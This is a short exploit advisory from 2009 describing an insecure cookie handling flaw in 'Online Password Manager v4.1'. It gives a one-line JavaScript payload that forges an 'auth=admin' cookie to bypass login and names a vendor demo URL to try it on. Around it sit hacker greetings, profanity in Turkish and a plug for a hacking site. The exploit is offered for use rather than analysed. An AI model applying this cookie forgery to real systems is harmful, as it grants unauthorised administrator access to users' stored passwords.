[~] Online Password Manager v4.1 Insecure Cookie Handling Vulnerability [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 15.04.2009 [~] [~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S [~] [~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com [~] ----------------------------------------------------------- yildirimordulari.com/OPM/main.php Exploit: javascript:document.cookie = "auth=[nick]; path=/"; Exploit for demo: http://www.esoftpro.com/demo/OPM/main.php javascript:document.cookie = "auth=admin; path=/"; [~] ---------------------------------------------------------------------- [~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & stack [~] [~] yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com [~] [~] ----------------------------------------------------------------------